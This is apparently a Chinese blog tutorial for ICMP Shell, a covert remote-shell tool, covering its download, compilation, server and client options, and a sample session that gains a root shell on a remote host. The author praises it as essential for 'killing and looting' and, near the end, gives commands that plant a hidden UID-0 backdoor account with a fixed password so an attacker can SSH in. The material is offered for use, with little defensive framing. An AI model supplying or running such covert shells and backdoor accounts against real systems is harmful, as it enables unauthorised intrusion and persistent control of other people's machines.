一、下载及安装
wget http://nchc.dl.sourceforge.net/project/icmpshell/ish/v0.2/ish-v0.2.tar.gz
tar zxvf ish-v0.2.tar.gz
cd ISHELL-v0.2/
make linux
最后这一步是根据操作系统类型来选择的,可选的类型有:
[root@localhost ISHELL-v0.2]# make
-------------------------------
Make with the OS from the list:
1.) linux
2.) bsd
3.) solaris
ex: make bsd
-------------------------------
[root@localhost ISHELL-v0.2]#
这里我选择make linux,编译完成后,会生成server端和client端两个程序文件。
二、用法
被控端:
[root@localhost ISHELL-v0.2]# ./ishd -h
ICMP Shell v0.2 (server) - by: Peter Kieltyka
usage: ./ishd [options]
options:
-h Display this screen
-d Run server in debug mode
-i Set session id; range: 0-65535 (default: 1515)
-t Set ICMP type (default: 0)
-p Set packet size (default: 512)
example:
./ishd -i 65535 -t 0 -p 1024
如上所示,可以指定上面的几个值 ,也可以不指定,使用默认的。
控制端:
[root@localhost ISHELL-v0.2]# ./ish -h
./ish: invalid option -- 'h'
ICMP Shell v0.2 (client) - by: Peter Kieltyka
usage: ./ish [options]
options:
-i Set session id; range: 0-65535 (default: 1515)
-t Set ICMP type (default: 0)
-p Set packet size (default: 512)
example:
./ish -i 65535 -t 0 -p 1024 host.com
示例:
[root@localhost ~]# ./ish =i 1515 -t 0 -p 512 192.168.1.100
ICMP Shell v0.2 (client) - by: Peter Kieltyka
--------------------------------------------------
Connecting to 192.168.1.100...done.
# id
uid=0(root) gid=0(root) (root) =unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
pwd
/
ifconfig
eth0 Link encap:Ethernet HWaddr 52:54:00:06:6D:3D
inet addr:192.168.1.100 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::5054:ff:fe06:6d3d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:974905 errors:0 dropped:0 overruns:0 frame:0
TX packets:170128 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:436113015 (415.9 MiB) TX bytes:16672843 (15.9 MiB)
[root@localhost ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 52:54:00:C6:61:24
inet addr:192.168.1.253 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::5054:ff:fec6:6124/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1585200 errors:0 dropped:0 overruns:0 frame:0
TX packets:92714 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:209254584 (199.5 MiB) TX bytes:15311207 (14.6 MiB)
其他不多说,杀人越货,居家必备。不过公网连接时(中间跨越多个路由交换设备时),有遇输完命令没有回显的情况。而实际上命令已经得到执行。遇到这种情况,可以通过添加用户,再用ssh进行连接,用完再删除就行了。如下,添加一个abc用户,密码为abc123:
useradd -o -u 0 abc
echo abc123 | passwd --stdin abc
151
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
